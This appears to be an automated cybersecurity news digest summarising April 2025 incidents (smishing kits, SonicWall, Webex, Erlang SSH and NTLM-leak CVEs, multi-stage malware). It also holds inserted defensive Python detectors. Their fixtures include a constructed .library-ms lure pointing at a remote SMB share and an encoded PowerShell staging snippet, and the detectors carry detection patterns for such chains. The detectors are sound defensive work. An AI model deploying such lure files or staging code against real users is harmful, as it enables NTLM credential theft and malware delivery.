Daily Brief

Summaries below are generated automatically for each article.

Total articles found: 11833

Checks for new stories every ~15 minutes

2025-04-18 15:21:20 thehackernews CYBERCRIME Chinese Smishing Kit Fuels Toll Fraud SMS Phishing in U.S.
Researchers have identified a large-scale SMS phishing (smishing) campaign that impersonates toll-road operators in eight U.S. states to defraud drivers. The lures are built with a smishing kit sold by an actor known as "Wang Duo Yu" as part of a China-based service called Lighthouse. Messages mimic toll-collection systems such as E-ZPass and point to spoofed sites; because iOS disables links in messages from unknown senders, the texts instruct recipients to reply (typically with "Y") so the link becomes clickable. The spoofed site then presents a fake CAPTCHA before harvesting personal details and payment card data on a counterfeit payment page. The kit is also linked to the Smishing Triad, a group that runs international postal-service impersonation scams at scale. Beyond the fraud itself, the kit contains a "double theft" backdoor: card data captured by the operator who bought the kit is also exfiltrated to the kit's authors. Wang Duo Yu's kits are now also being used against banks and financial institutions in the Asia-Pacific region. The campaign's scale, infrastructure and staffing make it difficult for Apple and Google to block the messages at the platform level.
2025-04-18 15:04:30 bleepingcomputer CYBERCRIME SonicWall VPN Devices Compromised in Active Cyber Attacks
SonicWall SMA 100 series appliances have been under attack since at least January 2025 through CVE-2021-20035, an OS command injection in the appliance management interface, according to Arctic Wolf. SonicWall's advisory originally described the impact as denial of service; it has since been updated to note that exploitation can lead to arbitrary code execution, and the CVSS score was raised to 7.2. The intrusions involved the appliances' local super-admin account, with default credentials still in place on compromised devices. Affected models include the SMA 200, 210, 400, 410 and the virtual SMA 500v. CISA added the vulnerability to its Known Exploited Vulnerabilities catalog, requiring federal agencies to patch by the catalog's deadline. Arctic Wolf recommends limiting VPN access to trusted sources, disabling unused accounts, enforcing multi-factor authentication and resetting all local account passwords. SonicWall has separately urged customers to patch a critical flaw in SMA1000 secure access gateways and an SSL VPN authentication bypass affecting Gen 6 and Gen 7 firewalls.
2025-04-18 13:44:17 bleepingcomputer CYBERCRIME Effective Strategies to Counter Credential-Based Cyberattacks
Credential-based attacks, in which attackers log in with weak or stolen credentials rather than exploiting a software flaw, are a favoured entry point because the activity looks legitimate and often evades detection. Google Cloud and IBM X-Force attribute a large share of cloud breaches and incidents to compromised accounts, roughly one-third of incidents worldwide. Organisations should enforce strong password policies, require multi-factor authentication, train staff regularly and audit Active Directory frequently. Continuously scanning Active Directory for passwords that appear in breach corpora, with a tool such as Specops Password Policy, helps catch compromised credentials before they are reused against the network. A rehearsed incident response plan minimises damage and recovery time when a credential-based attack does occur. Traditional controls should be supplemented with proactive measures such as compromised-password scanning. Specops Software's Password Policy blocks access with known compromised passwords and guides users toward stronger ones.
2025-04-18 13:44:17 bleepingcomputer NATION STATE ACTIVITY Chinese Hackers Escalate Attacks on Russia Using Advanced RAT
Kaspersky reports that IronHusky, a Chinese-speaking threat actor, has targeted government organisations in Russia and Mongolia with an updated version of its MysterySnail RAT. The initial lure was a malicious Microsoft Management Console (MMC) script disguised as a Word document, which retrieved second-stage payloads and established persistence on the host. An intermediary backdoor observed in the attacks supports file upload and download, command execution, process management and file deletion between compromised hosts and the attackers' servers. After the initial intrusions were blocked, the attackers switched to a stripped-down, single-component variant of the implant, which Kaspersky calls MysteryMonoSnail, that keeps only a reduced set of basic commands compared with the full RAT's much larger command set. IronHusky has been tracked since 2017 and has a history of espionage focused on military and diplomatic intelligence concerning Russia and Mongolia. Kaspersky's report documents the campaign in detail, including indicators of compromise.
2025-04-18 13:35:23 bleepingcomputer CYBERCRIME Effective Strategies to Combat Credential-Based Cyberattacks
Credential-based attacks, in which attackers authenticate with valid but stolen credentials, account for nearly one-third of cyberattacks worldwide and are behind 47% of cloud breaches. They succeed where credentials are weakly protected or not protected at all, which makes organisations with such gaps prime targets. Defensive steps include multi-factor authentication, strong password policies, regular staff training and frequent audits. Scanning Active Directory for passwords known to be compromised is a concrete way to remove the credentials attackers are most likely to try. Specops Password Policy supports this by blocking compromised passwords and guiding users toward stronger ones. Regular monitoring and updating of these controls keeps pace with attackers and limits the damage an incident can cause. The article's worked attack scenario illustrates how quickly such an intrusion unfolds and why preparation and rapid response matter.
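The two credential-attack items above both recommend scanning Active Directory for compromised passwords. The block below is an added example, not code from either article or from Specops, showing the k-anonymity range scheme that breached-password services such as Have I Been Pwned's Pwned Passwords API use for this: only the first five hex characters of the SHA-1 hash are sent to the service, which returns every known suffix for that prefix, and the comparison happens locally. The network call is replaced by a constructed in-memory range response (with made-up counts) so the example runs offline; `fake_fetch_range`, `audit` and the account labels are assumptions made for the example.

```python
"""
Added example (not from the articles or Specops): k-anonymity breached-password
check. Only a 5-character hash prefix is ever sent to the range service.
"""
import hashlib
from typing import Callable, Dict, Iterable, List, Tuple


def sha1_hex(password: str) -> str:
    """Upper-case hex SHA-1 of the password, as the Pwned Passwords corpus keys it."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def split_hash(hexdigest: str) -> Tuple[str, str]:
    """Split a hex digest into the 5-character prefix that is sent to the
    service and the remaining suffix that stays on the host."""
    h = hexdigest.upper()
    return h[:5], h[5:]


def parse_range_response(body: str) -> Dict[str, int]:
    """Parse 'SUFFIX:COUNT' lines (the Pwned Passwords range format)."""
    counts: Dict[str, int] = {}
    for line in body.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(":")
        counts[suffix.upper()] = int(count)
    return counts


def breach_count_for_hash(hexdigest: str, fetch_range: Callable[[str], str]) -> int:
    """How many times the hash appears in the corpus (0 = not found).
    fetch_range(prefix) must return the service's text body for that prefix."""
    prefix, suffix = split_hash(hexdigest)
    return parse_range_response(fetch_range(prefix)).get(suffix, 0)


def breach_count(password: str, fetch_range: Callable[[str], str]) -> int:
    """Convenience wrapper for a plaintext password; the password never leaves here."""
    return breach_count_for_hash(sha1_hex(password), fetch_range)


def audit(candidates: Iterable[Tuple[str, str]],
          fetch_range: Callable[[str], str]) -> List[Tuple[str, int]]:
    """Return (label, count) for every (label, password) found in the corpus."""
    hits = []
    for label, password in candidates:
        n = breach_count(password, fetch_range)
        if n:
            hits.append((label, n))
    return hits


# Constructed stand-in for the range service so the example runs offline.
# A real response lists every suffix sharing the prefix; counts here are made up.
_SAMPLE_RANGES = {
    "5BAA6": "\n".join([
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3730471",  # SHA-1("password")
        "0000000A1B2C3D4E5F60718293A4B5C6D7E:2",        # unrelated suffix
    ]),
}


def fake_fetch_range(prefix: str) -> str:
    """Assumed replacement for an HTTPS GET of /range/<prefix>."""
    return _SAMPLE_RANGES.get(prefix, "")


if __name__ == "__main__":
    # Labels stand for accounts; the passwords are constructed for the example.
    sample = [("svc-backup", "password"), ("j.doe", "correct horse battery staple!")]
    print(audit(sample, fake_fetch_range))  # [('svc-backup', 3730471)]
```

For a real Active Directory audit you would not hold plaintext passwords; the same prefix/suffix scheme works on NT hashes (the Pwned Passwords service offers an NTLM mode), and a function that issues the HTTPS range request drops in for `fake_fetch_range`. The point of the design is that the service learns only a 5-character prefix shared by hundreds of hashes, so a breached-password check does not itself become a credential leak.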
2025-04-18 12:15:00 bleepingcomputer MALWARE Cisco Webex Vulnerability Allows Hackers Remote Code Execution
Cisco has released updates for a high-severity vulnerability in the Cisco Webex App, tracked as CVE-2025-20236, that allows an unauthenticated remote attacker to achieve client-side code execution through a malicious meeting invite link. The flaw stems from insufficient input validation in the app's custom URL parser: a crafted link can cause the app to download arbitrary files, letting the attacker execute commands on the host with the privileges of the targeted user. Exploitation requires the victim to click the link. The vulnerability affects vulnerable releases of the Webex App regardless of operating system, and there is no workaround, so updating to a fixed release is the only mitigation. Cisco also fixed other issues, including a privilege escalation in Secure Network Analytics and a user-enumeration vulnerability in Nexus Dashboard. Cisco's security team is not aware of public exploit code or active exploitation of these flaws. Separately, a previously disclosed Cisco vulnerability, CVE-2024-20439, is being exploited in the wild, and CISA has directed U.S. federal agencies to apply the fix.
2025-04-18 12:09:30 thehackernews MALWARE Complex Multi-Stage Malware Attacks Employ Diverse Evasion Techniques
Palo Alto Networks Unit 42 has documented a multi-stage malware campaign delivering Agent Tesla, Remcos RAT and XLoader. The chain starts with a phishing email carrying a 7-Zip archive that contains a .JSE (JScript Encoded) file. The script downloads a PowerShell script, which decodes a Base64-encoded payload and launches the next stage. From there the campaign branches into several execution paths, using both .NET-compiled and AutoIt-compiled executables, so that blocking one path does not stop the infection and analysis is harder. The final payloads, such as Agent Tesla, are injected into legitimate .NET Framework utilities including RegAsm.exe and RegSvcs.exe. In a separate campaign, IronHusky targeted government organisations in Mongolia and Russia with a new version of the MysterySnail RAT, likely delivered by phishing with a malicious MMC script posing as an official document. Kaspersky notes that after defenders blocked the initial attacks, the group deployed a simpler, less capable variant dubbed MysteryMonoSnail.
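To make the first chain above concrete for detection engineering, the following is an added example, not code from The Hacker News or Unit 42: a small detector run over constructed process-creation events that flags each stage the article describes, namely a script host launching a .jse file, PowerShell started with an encoded command (decoded from its UTF-16LE Base64 form so the analyst can see the next stage), and RegAsm.exe or RegSvcs.exe spawned by an unexpected parent. The event format, the parent allowlist and the sample process tree are assumptions made for the example.

```python
"""
Added example (not from the article or Unit 42): flag the stages of a
.JSE -> encoded PowerShell -> RegAsm/RegSvcs injection chain in process events.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcEvent:
    """One process-creation event (field names are made up for this example)."""
    parent: str   # image name of the parent process
    image: str    # image name of the new process
    cmdline: str  # full command line of the new process


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
INJECTION_HOSTS = {"regasm.exe", "regsvcs.exe"}
# Parents from which RegAsm/RegSvcs are ordinarily launched: an assumed
# allowlist that would be tuned per environment.
EXPECTED_PARENTS = {"devenv.exe", "msiexec.exe", "msbuild.exe"}

JSE_ARG = re.compile(r"(?i)\.jse\b")
# Common spellings of PowerShell's -EncodedCommand switch (it accepts any
# unambiguous prefix) followed by a Base64 blob.
ENC_FLAG = re.compile(r"(?i)\s-e(?:c|ncodedcommand|nc|ncoded)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None.
    PowerShell Base64-encodes the UTF-16LE form of the script."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(events: List[ProcEvent]) -> List[Tuple[int, str, str]]:
    """Return (event index, rule name, detail) for each event matching a stage."""
    findings = []
    for i, ev in enumerate(events):
        image, parent = ev.image.lower(), ev.parent.lower()
        if image in SCRIPT_HOSTS and JSE_ARG.search(ev.cmdline):
            findings.append((i, "jse_script_host", ev.cmdline))
        elif image in POWERSHELL:
            decoded = decode_encoded_command(ev.cmdline)
            if decoded is not None:
                # The campaign's PowerShell stage itself unpacks another Base64 blob.
                rule = ("encoded_powershell_nested_base64"
                        if "frombase64string" in decoded.lower()
                        else "encoded_powershell")
                findings.append((i, rule, decoded[:80]))
        elif image in INJECTION_HOSTS and parent not in EXPECTED_PARENTS:
            findings.append((i, "regasm_regsvcs_unusual_parent", f"{ev.parent} -> {ev.image}"))
    return findings


# Constructed inner PowerShell stage; the embedded blob is a placeholder.
SAMPLE_SCRIPT = ("$blob='QUFBQQ==';$bytes=[Convert]::FromBase64String($blob);"
                 "[IO.File]::WriteAllBytes('C:\\Users\\Public\\stage2.bin',$bytes)")


def sample_events() -> List[ProcEvent]:
    """Constructed process tree resembling the chain described in the article."""
    enc = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
    return [
        ProcEvent("outlook.exe", "7zFM.exe", r'7zFM.exe "C:\Users\a\Downloads\invoice.7z"'),
        ProcEvent("explorer.exe", "wscript.exe", r'wscript.exe "C:\Users\a\Downloads\invoice.jse"'),
        ProcEvent("wscript.exe", "powershell.exe", "powershell.exe -nop -w hidden -enc " + enc),
        ProcEvent("explorer.exe", "powershell.exe", "powershell.exe -NoProfile -Command Get-Date"),
        ProcEvent("build.exe", "RegAsm.exe", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"),
        ProcEvent("devenv.exe", "RegAsm.exe", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /codebase x.dll"),
    ]


if __name__ == "__main__":
    for idx, rule, detail in analyse(sample_events()):
        print(f"[{idx}] {rule}: {detail}")
```

Decoding the encoded command matters more than matching the switch: the decoded text is where the next download URL, the nested `FromBase64String` call, or the AutoIt/.NET dropper path shows up, and it is what you pivot on when the later stages run from different binaries.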
2025-04-18 09:58:17 theregister MISCELLANEOUS Shakeup in Global Vulnerability Tracking Amid Funding Uncertainty
The CVE (Common Vulnerabilities and Exposures) program operated by MITRE came close to shutting down when its US government funding was about to lapse; a last-minute contract extension keeps it funded for another 11 months. In parallel, the European Union has launched its own vulnerability tracker, the European Union Vulnerability Database (EUVD), run by ENISA, to give Europe a vulnerability-management capability that does not depend on a single outside provider. The EUVD assigns its own identifiers while also recording CVE IDs and GSD IDs from the potentially defunct Global Security Database. The result could be fragmentation in how vulnerabilities are identified and tracked across regions, with consequences for coordinated disclosure and patch management. Industry experts question the wisdom of depending on a single government for funding and raise concerns about the neutrality of such programs, suggesting that a multi-nationally backed system would avoid the perception of partiality. There is also debate over whether regional systems such as the EUVD will be favoured over global ones as regional regulation pushes in that direction. New initiatives, including the CVE Foundation and the Global CVE Allocation System (GCVE), are exploring more robust and decentralised approaches. Through all of this the need for a single standard identifier remains: without one, vendors, scanners and defenders cannot reliably refer to the same bug.
2025-04-18 09:46:49 thehackernews DATA BREACH Preventing Data Breaches in AI-Integrated SaaS Environments
Employees are wiring AI tools into SaaS environments on their own, often bypassing existing security controls: summarising deals with an assistant, or connecting chatbots to business data, without recognising the data-exposure risk. These additions create "shadow integrations" in the SaaS stack that security teams cannot easily see. Traditional approaches that rely on manual tracking or user education do not scale to this problem. In an upcoming session, Dvir Sasson of Reco will discuss how to adapt security practices to AI's expanding role in day-to-day operations. The session argues that AI security readiness requires controls designed for decentralised, dynamic SaaS applications rather than retrofitted traditional ones, and encourages security teams to build AI-specific considerations and potential vulnerabilities into their strategies proactively.
2025-04-18 07:12:59 thehackernews DDOS Rising Threat: XorDDoS Malware Targets Linux, IoT and Docker Systems
XorDDoS, a Linux DDoS trojan active for more than a decade, is increasingly aimed at the United States: 71.3% of attacks observed between November 2023 and February 2025 targeted U.S. systems, according to Cisco Talos. The malware has broadened its reach beyond traditional Linux servers to Docker hosts and IoT devices, turning infected systems into bots. Initial access is typically gained by brute-forcing SSH credentials, after which the malware installs itself on the device. Persistence relies on init scripts and cron jobs that relaunch the malware at boot. The trojan stores its configuration encrypted and decrypts it at runtime with a hard-coded XOR key (the source of the XorDDoS name) before contacting its command-and-control (C2) servers. Since 2024 Talos has observed an updated architecture consisting of a central controller and a "VIP version" sub-controller that manages a large botnet, which suggests the operators sell access to the infrastructure. Language settings in the controller software point to Chinese-speaking operators. Beyond DDoS, infected hosts are also used to deploy secondary payloads such as cryptocurrency miners.
2025-04-18 04:34:05 thehackernews MALWARE CVE-2025-24054 Vulnerability Actively Exploited, NTLM Hashes Stolen
CISA has added CVE-2025-24054, a medium-severity NTLM hash disclosure spoofing vulnerability in Microsoft Windows, to its Known Exploited Vulnerabilities catalog after confirming it is being exploited to steal NTLM credentials. Microsoft patched the bug in March 2025, even though NTLM is a deprecated authentication protocol. The flaw can be triggered with minimal user interaction with a malicious file, such as single-clicking it, right-clicking to inspect it or merely browsing to the folder that contains it, without ever opening it. Attackers have delivered the malicious files by phishing, including via Dropbox links, to harvest NTLM hashes from targets primarily in Poland and Romania. Check Point reports several phishing campaigns using crafted .library-ms files to leak NTLMv2-SSP hashes, which can be relayed or cracked to authenticate as the victim and move laterally within a network. Although Microsoft rated the flaw "Exploitation Less Likely", it was weaponised within days of the patch, prompting urgent calls to apply the update. Federal civilian executive branch (FCEB) agencies must remediate it by May 8, 2025.
2025-04-17 21:38:38 bleepingcomputer MALWARE Critical Erlang SSH Vulnerability Risks Remote Code Execution
CVE-2025-32433, a critical flaw (CVSS 10.0) in the SSH server that ships with Erlang/OTP, allows unauthenticated remote code execution. It was found by researchers at Ruhr University Bochum in Germany. Every system running the Erlang/OTP SSH daemon is affected, and upgrading to a fixed OTP release is urgently advised. The impact is significant because Erlang underpins many telecom and high-availability systems. The bug lies in the daemon's handling of SSH protocol messages: it accepts connection-protocol messages, such as channel and exec requests, before authentication has completed, so an attacker who has only finished the key exchange can ask the server to run commands. Those commands execute with the privileges of the SSH daemon, which is frequently root. Horizon3's Attack Team called developing a proof of concept "surprisingly easy", underscoring the urgency of patching. Where an immediate update is impossible, restrict SSH access to trusted networks with firewall rules or disable the SSH daemon.
2025-04-17 20:58:23 bleepingcomputer DATA BREACH Legends International Reports Significant Data Breach Impacting Global Venues
Legends International has disclosed a data breach affecting employees and visitors to the venues it operates, after detecting unauthorised activity in its IT systems on November 9, 2024. The company confirmed that files containing personal data were exfiltrated, but has not yet determined which data types were exposed or how many people are affected. Legends manages more than 350 venues worldwide, including SoFi Stadium and One World Observatory. An investigation with external cybersecurity specialists is ongoing, and the company says it has strengthened its security controls since the incident, without describing either the previous or the new measures. Affected individuals are being offered 24 months of identity theft detection services through Experian, with enrolment closing in July 2025. There is no evidence so far that the stolen data has been misused, and no ransomware group has claimed responsibility.
2025-04-17 19:24:08 bleepingcomputer CYBERCRIME Phishing Attacks Exploit Windows Flaw to Target Government Entities
CVE-2025-24054, a Windows NTLM hash disclosure vulnerability fixed in March 2025, is being exploited in phishing campaigns against government bodies and private companies. The attackers send .library-ms files (Windows Library description files) that, when handled by Explorer, trigger an automatic outbound SMB connection to an attacker-controlled server, leaking the user's NTLM authentication hash. Microsoft had assessed the flaw as "Exploitation Less Likely", yet attacks were confirmed within days of the patch. The initial campaigns sent Dropbox links to ZIP archives containing the malicious .library-ms files to organisations in Poland and Romania; in later waves the .library-ms file was sent on its own, and simply downloading or extracting it was enough to trigger the leak. The SMB server's IP address had previously been associated with Russia's APT28, although there is not enough evidence for a definitive attribution. Captured NTLMv2 hashes can be relayed to other services or cracked offline, enabling authentication as the victim and, depending on the account, privilege escalation. Microsoft recommends installing the latest updates and, where possible, disabling NTLM authentication.
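Both CVE-2025-24054 items above (this one and the earlier entry) turn on the same artefact: a .library-ms file whose search connector points at a remote share. The block below is an added example, not from either article, Check Point or Microsoft, that parses the Library Description XML and reports any <url> that is a UNC path to a non-local host, which is the property a mail gateway or EDR scanner would key on. The two library files are constructed for the example (the benign one mirrors the shape of a stock Documents library); 192.0.2.10 is a documentation address.

```python
"""
Added example (not from the articles, Check Point or Microsoft): flag
.library-ms files whose search connector points at a remote UNC share.
"""
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple

# A UNC path: \\host\share... ; group 1 is the host.
UNC = re.compile(r"^\\\\([^\\]+)(?:\\|$)")
LOCAL_HOSTS = {"localhost", "127.0.0.1", "."}


def local_name(tag: str) -> str:
    """Strip the XML namespace ({uri}name -> name)."""
    return tag.rsplit("}", 1)[-1]


def remote_locations(data: bytes) -> List[Tuple[str, str]]:
    """Return (url, host) for every <url> in the library that is a UNC path
    to a host other than the local machine."""
    root = ET.fromstring(data)
    if local_name(root.tag) != "libraryDescription":
        raise ValueError("not a Windows library description")
    hits = []
    for elem in root.iter():
        if local_name(elem.tag) != "url" or not elem.text:
            continue
        url = elem.text.strip()
        m = UNC.match(url)
        if m and m.group(1).lower() not in LOCAL_HOSTS:
            hits.append((url, m.group(1)))
    return hits


def verdict(data: bytes) -> str:
    """Human-readable summary for a scanner log line."""
    hits = remote_locations(data)
    if not hits:
        return "clean"
    return "suspicious: " + ", ".join(f"{url} (host {host})" for url, host in hits)


# Constructed samples. The first follows the shape of a stock Documents library
# (a knownfolder GUID); the second points the library at a remote share, which
# makes Explorer attempt an SMB connection as soon as the file is rendered.
BENIGN_LIBRARY = rb"""<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

SUSPICIOUS_LIBRARY = rb"""<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>Invoice</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\192.0.2.10\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""


if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_LIBRARY), ("lure", SUSPICIOUS_LIBRARY)):
        print(name, "->", verdict(blob))
```

Because the first campaigns shipped the files inside ZIP archives, the check has to be applied to archive members as well as bare attachments. It complements, rather than replaces, the March patch and egress filtering of SMB (TCP 445) at the perimeter, which stops the hash from leaving the network even when a lure gets through.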
2025-04-17 18:57:39 theregister NATION STATE ACTIVITY Chris Krebs Resigns from SentinelOne After Security Clearance Revoked
Chris Krebs, ex-head of the US Cybersecurity and Infrastructure Security Agency (CISA), resigned from cybersecurity firm SentinelOne. President Trump issued an executive order revoking Krebs's and associated entities' security clearances, citing Krebs's denial of 2020 election fraud. The order also demands an investigation into Krebs's assurances of the 2020 election's security by the Attorney General and the Department of Homeland Security. Krebs joined SentinelOne in 2023 after his consultancy was acquired; the company was not involved in his activities during his tenure at CISA. Krebs stated his resignation was necessary to focus on fighting for democracy, freedom of speech, and the rule of law independently. Krebs publicly stated that the 2020 presidential election was secure, contrary to unfounded claims of widespread election malfeasance.